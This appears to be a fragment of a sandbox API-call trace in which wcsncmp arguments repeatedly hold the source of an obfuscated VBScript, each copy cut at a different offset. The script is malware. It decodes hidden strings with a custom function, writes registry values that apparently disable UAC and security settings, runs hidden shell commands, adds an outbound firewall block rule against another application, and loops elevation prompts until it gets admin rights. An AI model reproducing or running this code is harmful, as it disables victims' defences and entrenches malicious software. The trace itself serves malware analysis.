bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.291] wcsncmp (_String1=")\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.291] wcsncmp (_String1="\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0226.291] wcsncmp (_String1="\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.291] wcsncmp (_String1="Dim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 